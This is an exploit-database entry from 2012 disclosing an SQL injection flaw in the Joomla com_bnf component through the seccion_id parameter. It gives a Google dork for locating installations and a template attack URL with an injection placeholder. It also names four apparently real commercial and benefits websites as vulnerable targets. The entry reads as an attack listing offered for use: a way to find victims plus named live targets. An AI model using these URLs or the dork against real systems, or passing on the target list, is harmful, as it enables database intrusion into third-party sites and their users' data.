Joomla Component (com_bnf) SQL Injection Vulnerability

2012-01-30T00:00:00
ID 1337DAY-ID-17474
Type zdt
Reporter Daniel Godoy
Modified 2012-01-30T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: Joomla Component (com_bnf) SQL Injection Vulnerability
# Google Dork: index.php?option=com_bnf
# Date: 22/12/2011
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Tested on: Linux

Visiten : www.0x3a.com.ar www.remoteexecution.com.ar www.remoteexecution.info

[Comment]
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, LisandroLezaeta,Gaston Chareun,
Inyexion, Login-Root, KikoArg, Ricota,Truenex, sunplace, _tty0, Sensei , Jorge Nuñez,
LinuxFer, Rash, Scorp, Alan++, y demas usuarios de #RemoteExecution

[SQL Injection]
El error se encuentra en la variable seccion_id
http://localhost/index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=[SQL Inyection]&direccion=&direct=0&Itemid=0&lang=es


http://www.beneficioslacaja.com.ar/index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=[SQL%20Inyection]&direccion=&direct=0&Itemid=0&lang=es

http://swissmedical.beneficios-corporativos.com/index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=[SQL%20Inyection]&direccion=&direct=0&Itemid=0&lang=es

http://www.blueclub.com.ar/index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=[SQL%20Inyection]&direccion=&direct=0&Itemid=0&lang=es

http://www.beneficioszurichcom/index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=[SQL%20Inyection]&direccion=&direct=0&Itemid=0&lang=es



#  0day.today [2018-01-01]  #